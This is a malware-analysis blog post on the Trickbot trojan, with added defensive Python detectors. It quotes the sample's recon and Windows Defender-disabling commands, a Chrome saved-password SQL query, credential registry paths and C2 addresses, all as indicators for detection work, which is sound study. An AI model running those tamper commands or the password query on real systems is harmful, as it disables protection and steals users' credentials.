TRICKBOT
Trickbot is mainly used to steal data. Even though it’s known for financial hacking, it can be used for other purposes as well. Recently I witnessed a ransomware attack in Uganda, where Trickbot was used to take control of the network in the first place. In this blog, I will cover the actual executable ONLY and not the first-stage MS Office or MS Excel dropper.
Trickbot is capable of doing the following:
The trojan is composed of multiple modules. These modules are PE DLL files that are downloaded to the following locations:
D = DIRECTORY F = FILE ** FOLLOWED BY THE SIZE IN BYTES
-> D: \Users\foo\AppData\Roaming\NetLibs14
-> F: \Users\foo\AppData\Roaming\NetLibs14\
-> D: \Users\foo\AppData\Roaming\NetLibs14\data
-> F: \Users\foo\AppData\Roaming\NetLibs14\settings.ini ** 69496
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\systeminfo64 ** 21168
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64 ** 467392
-> D: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs\dinj ** 141792
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs\sinj ** 176
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\injectDll64_configs\dpost ** 928
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\pwgrab64 ** 1304928
-> D: \Users\foo\AppData\Roaming\NetLibs14\data\pwgrab64_configs
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\pwgrab64_configs\dpost ** 928
-> F: \Users\foo\AppData\Roaming\NetLibs14\settings.ini ** 0
-> F: \Users\foo\AppData\Roaming\NetLibs14\settings.ini ** 69608
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\psfin64 ** 22192
-> D: \Users\foo\AppData\Roaming\NetLibs14\data\psfin64_configs
-> F: \Users\foo\AppData\Roaming\NetLibs14\data\psfin64_configs\dpost ** 928
All the dropped modules are encrypted with AES-256; in some cases they are encoded with AES + XOR. The decryption information is stored in the obfuscated settings/config files. On execution, the payload spawns the following commands to collect reconnaissance data and tries to stop the Windows Defender service (WinDefend):
ipconfig /all
net config workstation
net config workstation
net1 config workstation
net view /all
net view /all /domain
nltest /domain_trusts
nltest /domain_trusts /all_trusts
sc stop WinDefend
sc delete WinDefend
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\foo\AppData\Roaming\WinSocket\IKDVSQW.exe
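The command chain above is a useful detection point: reconnaissance commands on their own are common admin activity, but several of them within minutes of `sc stop WinDefend` or `Set-MpPreference -DisableRealtimeMonitoring` from the same host is not. The following is an added example (not code from the original post) that scores Sysmon-style process-creation events for exactly that combination. The event tuple format and the sample events are constructed stand-ins for whatever an EDR or Sysmon pipeline emits; the parent image path is the dropped executable named above.

```python
"""Added example: flag hosts that run the Trickbot discovery commands together
with Windows Defender tampering inside a short time window.
Event format (timestamp, host, parent image, command line) is an assumption."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule: (category, regex over the command line as recorded by the sensor)
RULES = [
    ("discovery", re.compile(r"^ipconfig(\.exe)?\s+/all\b", re.I)),
    ("discovery", re.compile(r"^net1?(\.exe)?\s+config\s+workstation\b", re.I)),
    ("discovery", re.compile(r"^net(\.exe)?\s+view\s+/all\b", re.I)),
    ("discovery", re.compile(r"^nltest(\.exe)?\s+/domain_trusts\b", re.I)),
    ("defender_tamper", re.compile(r"^sc(\.exe)?\s+(stop|delete)\s+WinDefend\b", re.I)),
    ("defender_tamper", re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
]

PARENT = r"C:\Users\foo\AppData\Roaming\WinSocket\IKDVSQW.exe"

# Constructed sample events: (timestamp, host, parent image, command line)
SAMPLE_EVENTS = [
    ("2020-03-01T10:00:01", "WS01", PARENT, "ipconfig /all"),
    ("2020-03-01T10:00:02", "WS01", PARENT, "net config workstation"),
    ("2020-03-01T10:00:02", "WS01", PARENT, "net1 config workstation"),
    ("2020-03-01T10:00:03", "WS01", PARENT, "net view /all /domain"),
    ("2020-03-01T10:00:03", "WS01", PARENT, "nltest /domain_trusts /all_trusts"),
    ("2020-03-01T10:00:04", "WS01", PARENT, "sc stop WinDefend"),
    ("2020-03-01T10:00:04", "WS01", PARENT, "sc delete WinDefend"),
    ("2020-03-01T10:00:05", "WS01", PARENT, "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    # Benign admin activity on another host: one discovery command, no tampering
    ("2020-03-01T11:30:00", "ADMIN-PC", r"C:\Windows\System32\cmd.exe", "ipconfig /all"),
]

def classify(cmdline):
    """Return the rule category for a command line, or None if nothing matches."""
    for cat, rx in RULES:
        if rx.search(cmdline.strip()):
            return cat
    return None

def find_suspicious_hosts(events, window=timedelta(minutes=5), min_discovery=3):
    """Group matching events per host and flag a host when, inside `window`,
    it runs at least `min_discovery` distinct discovery commands AND at least
    one Defender-tampering command. Returns {host: {"parents": set, "hits": list}}."""
    per_host = defaultdict(list)
    for ts, host, parent, cmd in events:
        cat = classify(cmd)
        if cat:
            per_host[host].append((datetime.fromisoformat(ts), parent, cmd, cat))
    flagged = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _, _, _) in enumerate(hits):
            in_win = [h for h in hits[i:] if h[0] - t0 <= window]
            discovery = {h[2].lower() for h in in_win if h[3] == "discovery"}
            tamper = [h for h in in_win if h[3] == "defender_tamper"]
            if len(discovery) >= min_discovery and tamper:
                flagged[host] = {"parents": {h[1] for h in in_win},
                                 "hits": [h[2] for h in in_win]}
                break
    return flagged

if __name__ == "__main__":
    for host, info in find_suspicious_hosts(SAMPLE_EVENTS).items():
        print(host, "ran", len(info["hits"]), "matching commands from", info["parents"])
```

The threshold and window are tunable; the point is that the Defender-tampering commands gate the alert, so routine `ipconfig /all` runs by administrators do not fire on their own.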
Each module/DLL is decrypted and loaded in memory. It’s loaded by spawning svchost.exe and then injecting the decrypted DLL into that svchost.exe’s address space. This means each module runs in a separate instance of svchost.exe. The trojan creates a scheduled task as well.
Let’s look at the flow:
TROJAN IS USING MULTIPLE C2 SERVERS ON MULTIPLE PORTS, i.e. 443, 80, 449, 447 etc.
As you can see, there are multiple instances of svchost.exe. Because of the scheduled task, taskeng.exe is used. One of the svchost.exe instances has opened a port (19591), which is mainly used for IPC. The first instance of svchost.exe downloads the rest of the modules in an encrypted fashion:
=========================== (UDURRANI) =================================
(DATA PUSH!) IS COMING FROM 185.183.99.159 TO IP ADDRESS 172.16.223.132
PORT INFORMATION (447, 49373)
SEQUENCE INFORMATION (2372776804, 3009472621)
|URG:0 | ACK:1 | PSH:1 | RST:0 | SYN:0 | FIN:0|
(1494)
17 03 01 40 20 34 79 38 6D 54 C9 0B B1 13 38 A4 ...@ 4y8mT....8.
0E 86 8F 1F 45 E8 97 DD 5A 32 7A 1C 2E 8B A6 9C ....E...Z2z.....
D2 44 AE E5 1B 16 C7 0B A4 71 BC C5 F4 C0 1F 31 .D.......q.....1
67 0B D7 7B DB F3 22 E2 71 0C BC 33 44 39 7D 45 g..{..".q..3D9}E
69 81 D6 70 DD DB 58 47 0C BD CF 52 8A 9B 1B 25 i..p..XG...R...%
3A BF 7B 48 BF AE 8C 94 FF BE 72 98 4D 69 C6 A6 :.{H......r.Mi..
5A E1 5B 0D 55 77 2D DD F3 A7 63 83 C7 C4 B0 7C Z.[.Uw-...c....|
B2 54 C2 BD D5 66 13 17 E6 D0 71 F8 C7 BE CC A0 .T...f....q.....
D1 A5 A9 AD 85 80 1A 47 20 B7 AE C5 CB 0C 5A 34 .....?.G .....Z4
1E 28 7C 49 8D BB A6 70 F7 F9 EF 1B F8 8C 55 03 .(|I...p......U.
37 8B 5C C2 A6 42 6E 4B 5B 52 E6 BD D7 DF 0A 43 7.\..BnK[R.....C
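The leading bytes of that dump already say what the "encrypted fashion" is: `17 03 01 40 20` is a TLS record header (application data, record-layer version 3.1, length 0x4020), so the module download is ordinary TLS on a non-standard port rather than a custom cipher on the wire. The block below is an added example, not code from the original post, that parses dump lines in the format above and decodes the record header. It assumes the dump layout of sixteen hex bytes followed by an ASCII column, and it only decodes the header, since the lines shown are just the start of a 1494-byte packet.

```python
"""Added example: turn the packet dump into bytes, decode the TLS record
header, and flag TLS-looking traffic on ports where TLS is not expected."""
import re

# Constructed input: the first three dump lines quoted from the post.
DUMP = """\
17 03 01 40 20 34 79 38 6D 54 C9 0B B1 13 38 A4 ...@ 4y8mT....8.
0E 86 8F 1F 45 E8 97 DD 5A 32 7A 1C 2E 8B A6 9C ....E...Z2z.....
D2 44 AE E5 1B 16 C7 0B A4 71 BC C5 F4 C0 1F 31 .D.......q.....1
"""

CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake", 23: "application_data"}
VERSIONS = {0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}
# Ports where a TLS record is unremarkable; 447 and 449 from the post are not among them
STANDARD_TLS_PORTS = {443, 465, 587, 636, 993, 995, 8443}
BYTES_PER_LINE = 16
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

def parse_hexdump(text):
    """Convert '16 hex bytes + ASCII' dump lines to bytes. Tokens are taken
    until the first non-hex token (start of the ASCII column) or 16 bytes."""
    out = bytearray()
    for line in text.splitlines():
        taken = 0
        for tok in line.split():
            if taken == BYTES_PER_LINE or not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
            taken += 1
    return bytes(out)

def tls_record_header(data):
    """Decode the 5-byte TLS record header: content type, version, length."""
    if len(data) < 5:
        raise ValueError("need at least 5 bytes")
    ctype, vmaj, vmin = data[0], data[1], data[2]
    length = int.from_bytes(data[3:5], "big")
    version = (vmaj << 8) | vmin
    return {
        "content_type": CONTENT_TYPES.get(ctype, "unknown(%d)" % ctype),
        "version": VERSIONS.get(version, "unknown(0x%04x)" % version),
        "length": length,
        # plausible record: known type, major version 3, and a length within
        # the 2^14 + 2048 ciphertext limit
        "looks_like_tls": ctype in CONTENT_TYPES and vmaj == 3 and vmin <= 3 and length <= 18432,
    }

def assess_flow(data, server_port):
    """Header decode plus a verdict on whether TLS on this port is unexpected."""
    hdr = tls_record_header(data)
    hdr["nonstandard_port"] = hdr["looks_like_tls"] and server_port not in STANDARD_TLS_PORTS
    return hdr

if __name__ == "__main__":
    pkt = parse_hexdump(DUMP)
    print(assess_flow(pkt, 447))   # the C2 side of the capture above is port 447
```

The verdict is deliberately weak on its own (plenty of legitimate software uses TLS on odd ports); it is the combination with the svchost.exe parent and the other indicators on this page that makes it worth an alert.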
How are the modules loaded?
The main svchost.exe spawns another instance of svchost.exe -> it decrypts the module -> it injects the module into the new svchost.exe’s address space.
Stealing application password(s)
func_0(&arg_fo, *(int8_t *)("Grab_Passwords_Chrome(#)" + 0x0), 0x0);
func_1(&arg_f6, *(int8_t *)("\Google\Chrome\User Data\Default\Login Data.bak" + 0x0), 0x0);
select origin_url, username_value, password_value, length(password_value) from logins where blacklisted_by_user = 0
Grab_Passwords_Chrome() success
Stolen credential hashes are stored in the following location:
RegOpenKeyExW(0xffffffff80000001, u"Software\Microsoft\Internet Explorer\IntelliForms\Storage2", 0x0, 0x20019, …]);
The same approach is used for other browsers, such as Firefox and IE.
STEALING POS DATA
__func__(rsi, u"DOMAIN GC\r\n", 0x4, r9);
__func__(rsi, u"---------------------------------------------------------------\r\n", 0x4, r9);
__func__(rsi, u"COMPUTERS:\r\n", 0x4, r9);
__func__(rsi, u"POS found: %d\r\n", __func__0__(0x1800055b0, u"*POS*"), r9);
__func__(rsi, u"REG found: %d\r\n", __func__0__(0x1800055b0, u"*REG*"), r9);
__func__(rsi, u"CASH found: %d\r\n", __func__0__(0x1800055b0, u"*CASH*"), r9);
__func__(rsi, u"LANE found: %d\r\n", __func__0__(0x1800055b0, u"*LANE*"), r9);
__func__(rsi, u"STORE found: %d\r\n", __func__0__(0x1800055b0, u"*STORE*"), r9);
__func__(rsi, u"RETAIL found: %d\r\n", __func__0__(0x1800055b0, u"*RETAIL*"), r9);
__func__(rsi, u"BOH found: %d\r\n", __func__0__(0x1800055b0, u"*BOH*"), r9);
__func__(rsi, u"ALOHA found: %d\r\n", __func__0__(0x1800055b0, u"*ALOHA*"), r9);
__func__(rsi, u"MICROS found: %d\r\n", __func__0__(0x1800055b0, u"*MICROS*"), r9);
__func__(rsi, u"TERM found: %d\r\n\r\n", __func__0__(0x1800055b0, u"*TERM*"), r9);
GATHER SYSTEM INFO
SELECT * FROM Win32_OperatingSystem
CSDVersion
ProductType
BuildType
WindowsDirectory
SystemDirectory
BootDevice
SerialNumber
InstallDate
LastBootUpTime
RegisteredUser
Organization
TotalVisibleMemorySize
FreePhysicalMemory
Host Name
OS Name
OS Version
OS Architecture
It formats some of the info:
__func__(rdi, u"Install Date - %02u/%02u/%04u %02d.%02d.%02d\r\n", *(int16_t *)(rbp + 0xffffffffffffff96) & 0xffff, *(int16_t *)(rbp + 0xffffffffffffff92) & 0xffff);
For the product type, it applies some logic and reaches a final verdict, i.e. whether the victim’s machine Product Type is:
Domain Controller||Server||Workstation
All the information is saved to:
NetLibs14/data/module_name_configs/dpost
The main function used to send data to the C2 requires a char * value called “SendReport”:
__FUNC__(PTR, rdx, "SendReport" …);
sprintf() is used to write the delimiter/separator value “Arasfjasu7” into buff:
sprintf(buff, u"Content-Type: multipart/form-data; boundary=%s", u"Arasfjasu7");
SendReport contains the following functions to send the final report to the C2 and get the response.
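Because the boundary string is hard-coded rather than generated per request, the `Content-Type` header of the report upload is itself an indicator. The block below is an added example (not code from the original post) of the check a proxy or host-based sensor could run: it pulls the boundary out of the header, compares it against the fixed value above, and walks the multipart body to list the uploaded fields. The request bytes, the `/report` path and the field names are constructed for the demonstration; the C2 address is the one seen in the capture earlier on this page.

```python
"""Added example: detect the fixed multipart boundary in a report upload and
enumerate the parts of the body. The sample request is constructed."""
import re

KNOWN_BAD_BOUNDARIES = {"Arasfjasu7"}

# Constructed sample request with CRLF line endings as on the wire.
SAMPLE_REQUEST = (
    b"POST /report HTTP/1.1\r\n"
    b"Host: 185.183.99.159\r\n"
    b"Content-Type: multipart/form-data; boundary=Arasfjasu7\r\n"
    b"\r\n"
    b"--Arasfjasu7\r\n"
    b'Content-Disposition: form-data; name="proclist"\r\n'
    b"\r\n"
    b"svchost.exe\r\nsvchost.exe\r\n"
    b"--Arasfjasu7\r\n"
    b'Content-Disposition: form-data; name="sysinfo"\r\n'
    b"\r\n"
    b"OS Name: Windows\r\n"
    b"--Arasfjasu7--\r\n"
)

BOUNDARY_RX = re.compile(rb'multipart/form-data;\s*boundary="?([^";\r\n]+)"?', re.I)
NAME_RX = re.compile(rb'name="([^"]*)"')

def split_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body

def multipart_parts(body, boundary):
    """Return [(field name, payload)] for each part delimited by --boundary."""
    delim = b"--" + boundary.encode("latin-1")
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter: --boundary--
            break
        chunk = chunk.lstrip(b"\r\n")
        part_headers, _, payload = chunk.partition(b"\r\n\r\n")
        m = NAME_RX.search(part_headers)
        name = m.group(1).decode("latin-1") if m else None
        # the CRLF before the next delimiter belongs to the delimiter, not the payload
        parts.append((name, payload.rstrip(b"\r\n")))
    return parts

def inspect_post(raw):
    """Verdict dict: boundary value, whether it is a known Trickbot boundary,
    and the field names present in the body."""
    _, headers, body = split_request(raw)
    content_type = headers.get("content-type", "").encode("latin-1")
    m = BOUNDARY_RX.search(content_type)
    boundary = m.group(1).decode("latin-1") if m else None
    verdict = {"boundary": boundary,
               "known_bad": boundary in KNOWN_BAD_BOUNDARIES,
               "parts": []}
    if boundary:
        verdict["parts"] = [name for name, _ in multipart_parts(body, boundary)]
    return verdict

if __name__ == "__main__":
    print(inspect_post(SAMPLE_REQUEST))
```

On port 447 the upload is inside TLS, so a network sensor only sees this after TLS interception; on the host, an HTTP-layer hook or proxy-aware EDR sees it directly.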
DOMAIN INFO AND LATERAL MOVEMENT
The module looks for the dialect string NT LM 0.12, i.e. it checks whether SMBv1 is in use.
__FUNC__(u"\t\t*****MACHINE IN DOMAIN*****\n", u"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))
This is to get more info on the domain and decide whether the machine is:
MACHINE IN DOMAIN || MACHINE IN WORKGROUP
NetServerEnum() is used to enumerate all visible domain machines followed by gethostbyname().
It checks for the required privileges, infects the remote machine, and calls NetApiBufferFree to free the buffer.
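Two LDAP lookups appear in the module output on this page: the POS-module wildcards (`*POS*`, `*REG*`, and so on) and the domain filter `(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))`. The OID in that filter is the LDAP bitwise-AND matching rule and 8192 (0x2000) is the SERVER_TRUST_ACCOUNT bit of userAccountControl, so the filter selects domain controller computer accounts; finding one is how the module concludes it is in a domain. The block below is an added example, not code from the original post, that evaluates both lookups over a constructed directory so a defender can see what each of them would select. The computer names and userAccountControl values are invented; the pattern list and the filter string are the ones quoted above.

```python
"""Added example: evaluate the bit-AND userAccountControl filter and the POS
name wildcards over a constructed list of computer objects."""
import fnmatch
import re

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
SERVER_TRUST_ACCOUNT = 0x2000        # 8192: set on domain controller computer accounts
WORKSTATION_TRUST_ACCOUNT = 0x1000   # 4096: ordinary member machines
TRUSTED_FOR_DELEGATION = 0x80000     # typically also set on DCs

DC_FILTER = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))"

# Wildcards counted by the psfin module (quoted from the post)
POS_PATTERNS = ["*POS*", "*REG*", "*CASH*", "*LANE*", "*STORE*",
                "*RETAIL*", "*BOH*", "*ALOHA*", "*MICROS*", "*TERM*"]

# Constructed directory: (computer account name, userAccountControl)
DIRECTORY = [
    ("DC01$", TRUSTED_FOR_DELEGATION | SERVER_TRUST_ACCOUNT),
    ("DC02$", TRUSTED_FOR_DELEGATION | SERVER_TRUST_ACCOUNT),
    ("FILESRV$", WORKSTATION_TRUST_ACCOUNT),
    ("POS-LANE-03$", WORKSTATION_TRUST_ACCOUNT),
    ("REGISTER7$", WORKSTATION_TRUST_ACCOUNT),
    ("STORE12-BOH$", WORKSTATION_TRUST_ACCOUNT),
    ("HR-LAPTOP$", WORKSTATION_TRUST_ACCOUNT),
    ("TERMSRV01$", WORKSTATION_TRUST_ACCOUNT),
]

FILTER_RX = re.compile(r"\(userAccountControl:(?P<oid>[\d.]+):=(?P<value>\d+)\)")

def matches_uac_filter(filter_str, uac):
    """Evaluate the '(userAccountControl:<rule>:=<value>)' clause for one
    object. Only the bit-AND rule is implemented; the objectCategory=computer
    clause is assumed to hold for every entry in the input."""
    m = FILTER_RX.search(filter_str)
    if not m or m.group("oid") != LDAP_MATCHING_RULE_BIT_AND:
        raise ValueError("unsupported filter: " + filter_str)
    mask = int(m.group("value"))
    return (uac & mask) == mask          # bit-AND rule: every bit of the mask must be set

def domain_controllers(directory, filter_str=DC_FILTER):
    """Names the quoted filter would return, i.e. the domain controllers."""
    return [name for name, uac in directory if matches_uac_filter(filter_str, uac)]

def count_pos_like(directory, patterns=POS_PATTERNS):
    """Per-pattern counts as in the '%s found: %d' lines; LDAP wildcard
    matches on names are case-insensitive, so both sides are upper-cased."""
    names = [name.upper() for name, _ in directory]
    return {p: sum(1 for n in names if fnmatch.fnmatchcase(n, p.upper())) for p in patterns}

if __name__ == "__main__":
    print("domain controllers:", domain_controllers(DIRECTORY))
    for pattern, n in count_pos_like(DIRECTORY).items():
        print("%s found: %d" % (pattern.strip("*"), n))
```

Run against an export of your own computer objects, the same two functions show which hosts this module would pick out, which is useful for deciding where to prioritise SMBv1 removal and monitoring.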
Conclusion:
Info/Flow for other variants
QUE: ident.me , 1
ANS: 176.58.123.25
QUE: www.download.windowsupdate.com , 5
ANS: 2.20.249.202
ANS: 2.20.249.227
QUE: www.myexternalip.com , 2
ANS: 172.217.169.243
In some cases, the executables are downloaded as .png files. This has nothing to do with steganography: these are plain PE files downloaded with a .png or .jpg file extension.
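Since the files are plain PE images with a misleading extension, a content sniff catches them: anything that starts with `MZ` and whose `e_lfanew` field points at a `PE\0\0` signature is an executable no matter what it is called. The following is an added example (not code from the original post) of that content/extension mismatch check. The sample files are constructed byte strings built in the block itself, including a minimal fake PE header that is just enough for the check to recognise; no real sample is used.

```python
"""Added example: flag files that carry an image extension but contain a PE
header. All inputs are constructed in this file."""
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}

def is_pe(data):
    """True if data starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0 < e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def sniff(data):
    """Content type from magic bytes: 'pe', 'png', 'jpeg' or 'unknown'."""
    if is_pe(data):
        return "pe"
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    return "unknown"

def extension_mismatch(filename, data):
    """True when a file with an image extension actually contains a PE."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in IMAGE_EXTS and sniff(data) == "pe"

def build_fake_pe():
    """Construct the smallest header arrangement is_pe() accepts: a DOS header
    with e_lfanew = 0x80 followed by a PE signature and a stub COFF header.
    Constructed for the demonstration, not a real or loadable binary."""
    hdr = bytearray(b"MZ") + bytes(0x3C - 2)         # DOS header up to e_lfanew
    hdr += struct.pack("<I", 0x80)                    # e_lfanew
    hdr += bytes(0x80 - len(hdr))                     # padding where the DOS stub would be
    hdr += b"PE\x00\x00" + struct.pack("<HH", 0x8664, 0)  # signature, Machine=AMD64, 0 sections
    return bytes(hdr)

# Constructed samples: name -> content
SAMPLES = {
    "banner.png": PNG_MAGIC + bytes(64),
    "photo.jpg": JPEG_MAGIC + b"\xe0" + bytes(64),
    "module.png": build_fake_pe(),      # PE delivered under an image extension
    "tool.exe": build_fake_pe(),        # PE under its own extension: not a mismatch
}

def scan(samples):
    """Return the names of files whose extension lies about their content."""
    return [name for name, data in samples.items() if extension_mismatch(name, data)]

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print("%-12s %-8s mismatch=%s" % (name, sniff(data), extension_mismatch(name, data)))
```

The same check works on a proxy's download cache or on files written to `%AppData%`; for the variant on this page the hit would be a `.png` or `.jpg` that sniffs as `pe`.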